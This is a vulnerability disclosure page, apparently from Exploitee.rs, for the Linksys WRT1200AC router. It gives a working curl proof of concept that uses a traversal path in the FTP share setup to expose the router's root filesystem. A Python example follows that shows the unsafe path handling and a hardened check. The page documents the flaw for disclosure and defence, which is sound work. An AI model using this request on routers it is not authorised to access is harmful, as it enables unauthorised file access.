Difference between revisions of "Linksys WRT1200AC"

From Exploitee.rs
Latest revision as of 12:27, 10 August 2017

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."


Linksys WRT1200AC

Built on the foundation of our original WRT's open-source heritage, the Linksys WRT1200AC delivers superior network performance for the most demanding users. The WRT1200AC features two external antennas, a powerful 1.3GHz dual-core ARM, and Wireless-AC to provide high-speed Wi-Fi connections with exceptional range.

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device. Purchase the Linksys WRT1200AC at Amazon

Post Authentication Arbitrary File Access

Arbitrary file access after authentication: the path field in the media sharing (FTP folder) setup is not sanitized, so an authenticated user can create a share whose path traverses out of the USB partition and exposes the router's root filesystem.

POC

The following curl command is a Proof of Concept which demonstrates creating a file share at /.

  • Firmware Version: 1.0.5.177401
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' \
-H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' \
-b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' \
--data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' \
'http://192.168.1.1/JNAP/'
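To make the flaw concrete from the defender's side, here is an added example (not router firmware or Exploitee.rs code) that mirrors the unsanitized path handling described above beside a hardened version that confines the share to the partition's mount point; the mount point table and function names are assumptions for illustration, and the request body is the PoC's JSON.

```python
import json
import posixpath

# Constructed copy of the CreateFTPFolder body from the PoC above.
POC_BODY = ('{"name":"HAXHAXHAX","partitionName":"/dev/sda1",'
            '"path":"/../../../../../../","isReadOnly":false,'
            '"groupsWithPermission":["testuser","admin"]}')

# Hypothetical mapping of partition name to its mount point on the router.
MOUNT_POINTS = {"/dev/sda1": "/tmp/mnt/sda1"}


def share_root_unsafe(partition: str, path: str) -> str:
    """Mirrors the flaw: the user-supplied path is appended to the mount
    point with no check, so '..' segments walk out of the USB disk.
    normpath shows what the filesystem would resolve the share to."""
    return posixpath.normpath(MOUNT_POINTS[partition] + path)


def share_root_safe(partition: str, path: str) -> str:
    """Hardened variant: treat the path as relative to the mount point,
    normalize it lexically, and reject anything that lands outside.
    (Real firmware should also resolve symlinks with os.path.realpath.)"""
    mount = MOUNT_POINTS[partition]
    rel = path.lstrip("/")  # share paths are always relative to the mount
    resolved = posixpath.normpath(posixpath.join(mount, rel))
    if resolved != mount and not resolved.startswith(mount + "/"):
        raise ValueError(f"share path escapes {mount}: {path!r}")
    return resolved


def check_request(body: str) -> dict:
    """Parse a CreateFTPFolder body and report whether the hardened
    check would accept it, and where the share would be rooted."""
    req = json.loads(body)
    try:
        root = share_root_safe(req["partitionName"], req["path"])
        return {"accepted": True, "root": root}
    except ValueError as exc:
        return {"accepted": False, "reason": str(exc)}


if __name__ == "__main__":
    print("unsafe resolves PoC path to:",
          share_root_unsafe("/dev/sda1", "/../../../../../../"))
    print("hardened check on PoC body:", check_request(POC_BODY))
```

The unsafe variant resolves the PoC's path to "/", which is exactly the root-level share the curl command creates; the hardened check refuses it while still accepting ordinary share paths such as "/photos".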

Demo

Video demonstration: https://www.youtube.com/watch?v=wwUB6R1rRTQ